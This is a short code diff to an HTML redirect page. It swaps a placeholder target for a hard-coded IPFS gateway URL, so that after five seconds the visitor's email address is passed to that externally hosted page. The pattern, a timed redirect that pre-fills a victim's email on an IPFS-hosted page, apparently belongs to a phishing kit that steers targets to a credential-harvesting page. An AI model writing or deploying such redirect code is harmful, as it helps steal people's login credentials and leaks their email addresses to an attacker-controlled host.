--- a/html/extended-ui-redir.html
+++ b/html/extended-ui-redir.html
@@ -125,7 +125,7 @@
 
         setTimeout(() => {
           // Redirect to the desired URL
-          window.location.href = "new_url"+email; // Change this to the URL you want to redirect to
+          window.location.href = "https://ipfs.io/ipfs/bafybeiftk6f7eccyye6wsggmtkptqzzailrspmspyumxnyfie5zlgigrea/#"+email; // Change this to the URL you want to redirect to
         }, 5000); // 5 seconds delay
       } else {
         // Stay on the current page or reload if needed
